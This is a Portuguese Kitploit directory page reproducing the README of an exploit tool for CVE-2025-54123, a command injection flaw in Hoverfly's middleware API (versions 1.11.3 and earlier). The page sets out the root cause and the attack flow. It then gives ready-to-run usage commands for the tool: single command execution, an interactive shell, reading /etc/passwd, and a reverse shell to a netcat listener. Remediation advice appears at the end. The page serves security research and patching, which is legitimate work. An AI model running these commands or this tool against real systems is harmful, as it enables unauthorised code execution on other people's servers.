Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit — Exploit de RCE autenticado para Hoverfly ≤ 1.11.3 (CVE-2025-54123) via injeção de comandos do SO na API de middleware. Suporta execução de comando único, pseudo-shell interativa e reverse shell para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControlePapers e PesquisaAprendizado e EducaçãoRed TeamingDesenvolvimento de Payloads

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit

Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit

Exploit de RCE autenticado para Hoverfly ≤ 1.11.3 (CVE-2025-54123) via injeção de comandos do SO na API de middleware. Suporta execução de comando único, pseudo-shell interativa e reverse shell para testes de segurança autorizados.

Ver Repositório
1há 2 mesesAinda não revisado

CVE-2025-54123 — Execução Remota de Código na API Middleware do Hoverfly

RCE Autenticado via Injeção de Comandos do SO no Hoverfly ≤ 1.11.3

Visão Geral da Vulnerabilidade

PropriedadeValor
ID CVECVE-2025-54123
Pontuação CVSS9.8 — Crítica
Vetor CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-78 (Injeção de Comandos do SO), CWE-20 (Validação de Entrada Incorreta)
ProdutoHoverfly — Ferramenta de simulação de API de código aberto
AfetadoTodas as versões até e incluindo 1.11.3
Corrigido em1.12.0 (commit do patch)
AdvertênciaGHSA-r4h8-hfp2-ggmf

Análise Técnica

Aqui está um estudo de caso aprofundado e análise técnica como perspectiva white box e black box https://medium.com/@phantom_hat/cve-2025-54123-hoverfly-1-11-3-command-injection-rce-case-study-patch-diffing-aacc092f7f3a

Superfície de Ataque

O Hoverfly expõe uma API de administração RESTful (porta padrão 8888) para gerenciar configurações de simulação. O endpoint de gerenciamento de middleware em /api/v2/hoverfly/middleware aceita um corpo JSON com campos binary e script que definem um processo de middleware externo.

Causa Raiz

Esta vulnerabilidade surge de uma combinação de três falhas no código:

  1. Validação de Entrada Insuficiente — middleware.go:93-96: A função SetBinary() aceita o parâmetro binary sem qualquer validação ou sanitização, permitindo que um atacante especifique executáveis arbitrários (ex.: bash).

  2. Execução de Comando Insegura — local_middleware.go:14-19: O middleware é executado via exec.Command() com os valores binary e script controlados pelo atacante passados diretamente como argumentos, permitindo injeção de comandos do SO.

  3. Execução Imediata Durante o Teste — hoverfly_service.go:173: Quando o middleware é configurado via API, o Hoverfly testa imediatamente o middleware executando-o, acionando o comando injetado no momento da configuração, e não no momento da interceptação do proxy.

Fluxo do Ataque

root@kitploit:~
Attacker                              Hoverfly (≤ 1.11.3)
   │                                        │
   │─── POST /api/token-auth ──────────────>│  (1) Authenticate
   │<── { "token": "eyJ..." } ─────────────│
   │                                        │
   │─── PUT /api/v2/hoverfly/middleware ───>│  (2) Inject payload
   │    { "binary": "bash",                 │
   │      "script": "<malicious cmd>" }     │
   │                                        │
   │    ┌──────────────────────────────────┐│
   │    │ exec.Command("bash", tmpScript)  ││  (3) Immediate execution
   │    │ → attacker command runs as       ││
   │    │   the Hoverfly process user      ││
   │    └──────────────────────────────────┘│
   │                                        │
   │<── Command output in error response ──│  (4) Exfiltrate output
   │                                        │

Uso do Exploit

Pré-requisitos

  • Python 3.8+
  • Credenciais válidas para a API de administração do Hoverfly (padrão: admin / senha configurável)

Instalação

root@kitploit:~
git clone https://github.com/<your-username>/CVE-2025-54123.git
cd CVE-2025-54123
pip install -r requirements.txt

Modos de Operação

Modo Apenas Verificação

Verifique a acessibilidade do alvo e a autenticação sem exploração:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -C

Execução de Comando Único

Execute um único comando do SO no alvo:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -c 'id'

Pseudo-Shell Interativo

Entre em uma sessão de shell persistente:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -i

Shell Reverso

Envie um shell reverso para seu ouvinte:

root@kitploit:~
# Terminal 1 — start listener
nc -lvnp 4444

# Terminal 2 — launch exploit
python3 exploit.py -u http://target:8888 -U admin -P <password> --revshell 10.0.0.1:4444

Modo Detalhado com Proxy

Encaminhe o tráfego através do Burp Suite para inspeção:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -c 'cat /etc/passwd' --proxy -v

Referência Completa de Flags


Remediação

Detalhes do Patch

A correção no commit 17e60a9 desabilita a API de definição de middleware por padrão. Alterações subsequentes na documentação (commit a9d4da7) conscientizam os usuários sobre as implicações de segurança de expor este endpoint.


Referências

  • NVD — CVE-2025-54123
  • Advertência de Segurança do GitHub — GHSA-r4h8-hfp2-ggmf
  • Código Vulnerável — hoverfly_service.go#L173
  • Código Vulnerável — middleware.go#L93
  • Código Vulnerável — local_middleware.go#L13
  • Commit do Patch — 17e60a9

Aviso Legal

Esta ferramenta é fornecida apenas para fins autorizados de teste de segurança e pesquisa educacional. O acesso não autorizado a sistemas de computador é ilegal sob o Computer Fraud and Abuse Act (CFAA) e leis equivalentes em todo o mundo. O autor não assume nenhuma responsabilidade pelo uso indevido deste software. Sempre obtenha permissão explícita por escrito antes de testar qualquer sistema que você não possui.


Estrutura do Projeto

root@kitploit:~
CVE-2025-54123/
├── Exploit/
│   ├── exploit.py          # Polished exploit
│   └── raw_exploit.py      # Original raw PoC
├── Images/                 # Research screenshots
├── Reference/              # Reference exploits for study
├── requirements.txt        # Python dependencies
└── README.md               # This file

Autor

Phantom Hat — Pesquisador de Segurança


Esta pesquisa foi realizada como parte de um estudo de caso de vulnerabilidade para fins educacionais.

Baixar ferramenta
BandeiraDescriçãoPadrão
-u, --urlURL do Hoverfly alvoObrigatório
-U, --usernameNome de usuário adminObrigatório
-P, --passwordSenha do adminObrigatório
-c, --commandComando do SO a executar—
-C, --checkModo apenas verificação (sem exploração)false
-i, --interactivePseudo-shell interativofalse
--revshellShell reverso LHOST:LPORT—
--proxyEncaminhar através de 127.0.0.1:8080false
--timeoutTempo limite da requisição (segundos)15
-v, --verboseHabilitar saída detalhadafalse
AçãoDetalhes
AtualizaçãoAtualize o Hoverfly para v1.12.0 ou posterior, onde a API de definição de middleware está desabilitada por padrão
Segmentação de RedeRestrinja o acesso à API de administração do Hoverfly (porta 8888) apenas a redes confiáveis
AutenticaçãoUse senhas fortes e únicas para a API de administração do Hoverfly
MonitoramentoMonitore requisições PUT inesperadas para /api/v2/hoverfly/middleware